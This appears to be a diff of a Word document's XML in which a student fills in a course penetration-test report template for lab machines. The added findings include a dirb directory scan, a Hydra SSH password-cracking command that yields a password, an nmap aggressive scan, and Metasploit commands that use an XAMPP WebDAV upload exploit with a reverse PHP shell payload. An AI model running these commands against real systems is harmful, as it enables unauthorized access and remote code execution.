+      <w:bookmarkEnd w:id="20"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>. Machines store snapshots of vulnerable states.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>2. Machines use the same passwords.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc100619268"/>
       <w:r>
         <w:t>Significant Vulnerability Details</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
+      <w:bookmarkEnd w:id="21"/>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve">Details about the significant vulnerabilities </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">you listed above </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
+        <w:t xml:space="preserve">listed above </w:t>
+      </w:r>
+      <w:r>
         <w:t>are provided below.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2179,77 +3082,144 @@
         <w:t xml:space="preserve">HIGH RISK </w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;Tell us more, and make sure the effort could be replicated. What commands were used? What was found? Make sure to detail ALL identified significant vulnerabilities.&gt;</w:t>
-      </w:r>
-    </w:p>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Example: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The student found that both the </w:t>
+      <w:r>
+        <w:t>1. Using the directory buster with the Udacity.txt wordlist</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> we discover the keys file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Command: </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>LibSSH</w:t>
+        <w:t>dirb</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and Elasticsearch packages contained vulnerabilities directly associated with the lack of patching. </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId11" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://10.1.0.7</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> udacity.txt</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
+      <w:r>
+        <w:t>Navigating to that URL reveal</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s:</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5F7953AB" wp14:editId="4C8BB963">
-            <wp:extent cx="5176838" cy="2509328"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="752D561C" wp14:editId="674D70BF">
+            <wp:extent cx="1856839" cy="1114425"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="13" name="image6.png"/>
-            <wp:cNvGraphicFramePr/>
+            <wp:docPr id="27" name="Picture 27" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
             <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="image6.png"/>
-                    <pic:cNvPicPr preferRelativeResize="0"/>
+                    <pic:cNvPr id="17" name="Picture 17" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId12"/>
+                    <a:srcRect b="24710"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1860851" cy="1116833"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">2. Using Hydra we can </w:t>
+      </w:r>
+      <w:r>
+        <w:t>crack</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the password of </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the payroll server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Command: hydra -l admin123 -P udacity.txt ssh://10.1.0.12</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0402D943" wp14:editId="46AC7DCF">
+            <wp:extent cx="6858000" cy="2540000"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="28" name="Picture 28" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="23" name="Picture 23" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
+                    <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
-                    <a:srcRect/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2257,12 +3227,11 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5176838" cy="2509328"/>
+                      <a:ext cx="6858000" cy="2540000"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
-                    <a:ln/>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -2271,307 +3240,74 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="360"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Example of a machine with </w:t>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>This reveals the password Password123!</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">3. </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>XAMPP is out of date.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Scan for service versions</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t>LibSSH</w:t>
+        <w:t>nmap</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Missing Software Patches</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Discussion:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">&lt;In your discussion, be sure to mention: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Vulnerabilities were discovered &lt;in what? why?&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:spacing w:before="0"/>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Are there any links available to discuss? </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="1ci93xb" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkStart w:id="17" w:name="3whwml4" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="16"/>
-      <w:bookmarkEnd w:id="17"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:t>This concludes the Significant Vulnerability Detail portion of this report.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:bookmarkStart w:id="18" w:name="qsh70q" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkStart w:id="19" w:name="3as4poj" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkStart w:id="20" w:name="1pxezwc" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="18"/>
-      <w:bookmarkEnd w:id="19"/>
-      <w:bookmarkEnd w:id="20"/>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc67660177"/>
-      <w:r>
-        <w:t>Appendix A: Security Analysis Methodology</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="21"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The methodology the analyst used for the vulnerability assessment is provided below.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Describe the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>target m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">achine </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>details here&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Example: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The student launched the provided VM and noted the IP address after booting. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">System IP Address: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> LIST IP HERE </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepNext/>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:before="240"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:highlight w:val="white"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> aggressive scan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Command: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -A 10.1.2.4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
-          <w:highlight w:val="white"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2753E4E1" wp14:editId="58806461">
-            <wp:extent cx="6115050" cy="2600325"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F3DD375" wp14:editId="56D8BEDB">
+            <wp:extent cx="4904281" cy="4286250"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="14" name="image4.png"/>
-            <wp:cNvGraphicFramePr/>
+            <wp:docPr id="29" name="Picture 29" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
             <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="image4.png"/>
-                    <pic:cNvPicPr preferRelativeResize="0"/>
+                    <pic:cNvPr id="20" name="Picture 20" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
-                    <a:srcRect/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2579,12 +3315,11 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="6115050" cy="2600325"/>
+                      <a:ext cx="4913063" cy="4293926"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
-                    <a:ln/>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -2593,77 +3328,246 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="360"/>
-        <w:jc w:val="center"/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Research exploits on outdated version of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.exploit-db.com/exploits/18367</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Commands:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>use exploit/windows/http/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xampp_webdav_upload_php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>set RHOSTS 10.1.2.4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>set payload php/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>run</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Example: </w:t>
-      </w:r>
-      <w:r>
+        </w:rPr>
+        <w:t>Discussion:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Vulnerabilities were discovered </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">in all 4 pieces of infrastructure. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:spacing w:before="0"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Links: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId16" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.exploit-db.com/exploits/18367</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>This concludes the Significant Vulnerability Detail portion of this report.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:bookmarkStart w:id="22" w:name="qsh70q" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkStart w:id="23" w:name="3as4poj" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkStart w:id="24" w:name="1pxezwc" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="24"/>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc100619269"/>
+      <w:r>
+        <w:t>Appendix A: Security Analysis Methodology</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="25"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The methodology the analyst used for the vulnerability assessment is provided below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t>Console Screen of Application Virtual Machine</w:t>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>1. Reconnaissance</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>2. Scanning</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>3. Vulnerability Research</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>4. Exploitation</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc67660178"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc100619270"/>
       <w:r>
         <w:t>Assessment Tools Selection</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="22"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Add tools and notes in the section below, as used</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2711,7 +3615,7 @@
           <w:color w:val="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId12">
+      <w:hyperlink r:id="rId17">
         <w:r>
           <w:rPr>
             <w:color w:val="0000FF"/>
@@ -2742,7 +3646,7 @@
         <w:rPr>
           <w:color w:val="000000"/>
         </w:rPr>
-        <w:t>Description</w:t>
+        <w:t>Linux OS used for penetration testing.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2780,7 +3684,7 @@
           <w:between w:val="nil"/>
         </w:pBdr>
       </w:pPr>
-      <w:hyperlink r:id="rId13">
+      <w:hyperlink r:id="rId18">
         <w:r>
           <w:rPr>
             <w:color w:val="1155CC"/>
@@ -2805,7 +3709,7 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:t>Description</w:t>
+        <w:t>Environment used to run tools and exploits.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2846,7 +3750,7 @@
           <w:color w:val="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId14">
+      <w:hyperlink r:id="rId19">
         <w:r>
           <w:rPr>
             <w:color w:val="1155CC"/>
@@ -2874,7 +3778,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>Description</w:t>
+        <w:t>Network Scanner</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2892,7 +3796,7 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:t>Others</w:t>
+        <w:t>Metasploit</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2910,7 +3814,7 @@
         </w:pBdr>
